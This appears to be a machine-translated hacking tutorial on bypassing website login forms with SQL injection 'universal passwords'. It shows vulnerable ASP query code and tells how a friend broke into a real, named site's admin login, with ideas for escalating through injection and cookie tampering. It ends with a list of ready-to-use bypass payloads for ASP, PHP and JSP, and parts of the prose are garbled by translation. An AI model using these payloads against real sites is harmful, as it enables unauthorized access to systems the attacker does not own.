Website Login hack

<%
PWD = Request.Form ("password")//Get password for user login and assign value to pwd

user = Request.Form ("username")//Get the username of the background login and assign a value to users

Set RS = Server.CreateObject ("ADODB". Connection ")//Connect to Database

sql = "SELECT * from admin where username= '" & User & "' and Password= '" & pwd & "'"//Query database

........

You don't have to write it back!

Let's take a look at the cause of the loophole!

For example, in the background when we first input: admin/admin888, then in the check.asp (assuming there is no MD5 encryption):

user=admin,pwd=admin888

Then query: SELECT * FROM admin where UserName = ' admin ' and PassWord = ' admin888 '

If the username field of the database Admin table exists with the admin record, and the corresponding field password exists admin888, then the login succeeds and the user's session! is set

However, with the universal password ' or ' = ' or '/' or ' = ' or ' login?

User= ' or ' = ' or ' pwd= ' or ' = ' or '

The query statement is: SELECT * from admin where UserName = ' or ' = ' or ' and PassWord = ' or ' = ' or '

(For the sake of reason, I added a space to enter)

This sentence means: Query the database (the user name is empty or empty equals null (this sentence is correct)) and (the password is empty or empty equals null (also correct))

You can see that the User name section is connected with or (or), the result is true, and the password part also returns true, so the connection with and, of course, is true, so you can bypass it!

This is the main part of the principle! >_<

Of course, there are many kinds of universal password, and here is not to say!

However, flexible use is the most important!

Look at a practical example!

Friends Little Tree a few days ago to see a station (http://www.czdh.com.cn/manage/login.asp), you can use the universal password ' or ' = ' or ' login, and the background has a database backup, but, unfortunately, no permissions, strange!

In general, ' or ' = ' or ' login is admin identity, and this incredibly just a normal administrator!

Oh, there is nothing in fact! As we have just said, if the universal password can be correct, then it is also due to the query when the order of the bar, starting from the first record to check! Since it is always correct, he will return the first record, right?

Unfortunately, in this administrator table, the first record is a regular administrator!

Oh, the cup!

The privilege is really small! Upload permissions do not seem to have, the cup has! Of course, there are some ideas!

For example: If there is an injection point, you can get the administrator's user name and password (MD5 encryption, then add difficulty, can not be cracked), and then use the Universal password login backstage, and then modify the cookie, hehe! Needless to say, it is possible to cheat success!

The reason for sure: grab the packet analysis to draw!

Another cup is: No injection points found!

Well, there seems to be no way!

Oh!

I have been thinking, how to use the Universal password login success, and identity is the admin

My username and password are entered: admin ' or ' = '

The error is as follows:

Syntax error (operator missing) in query expression ' adminname= ' admin ' or ' = ' and adminpass= ' 915c991fe2863ae671cb4f5066dad485 '

Hey, that's how it is!

It's just a grammatical mistake, but it gives us a clue!

Pay attention to the wrong content of the newspaper, no longer analyze it! We suspect that if there is admin this user, then we construct a correct statement, then, is it possible to log in as admin?

Oh, sure enough!

Username and password are: admin ' or ' 1

Hey! Login success, the user is the admin!

Oh! Flexible use is the key!

Of course, through just the idea! It is obvious that we can construct a user of any existence, and can login successfully!

Look, the shell is not really good to take! Hey!

Reference URL: http://www.douban.com/note/148789639/

ASP aspx Universal password

1: "or" a "=" a
2: ') or (' a ' = ' a
3:or 1=1--
4: ' or 1=1--
5:a ' or ' 1=1--
6: "or 1=1--
7: ' or ' a ' = ' a
8: "or" = "a ' = ' a"
9: ' or ' = '
Ten: ' or ' = ' or '
11:1 or ' 1 ' = ' 1 ' =1
12:1 or ' 1 ' = ' 1 ' or 1=1
: ' OR 1=1%00
: "or 1=1%00
: ' XOR
16: New Universal Login Password

User name ' UNION Select 1,1,1 from admin Where ' = ' (replace table name Admin)
Password 1
USERNAME=-1%CF ' Union select 1,1,1 as password,1,1,1%23
Password=1

17..admin ' or ' a ' = ' a password whatever


PHP Universal Password

' or ' = ' or '

' or 1=1/* character type GPC whether open can be used

User:something
Pass: ' OR ' 1 ' = ' 1

JSP Universal Password

1 ' or ' 1 ' = ' 1

Admin ' OR 1=1/*

User name: admin system When this user is available
Password: 1 ' or ' 1 ' = ' 1
Reference URL: http://www.douban.com/note/168041331/

Website Login hack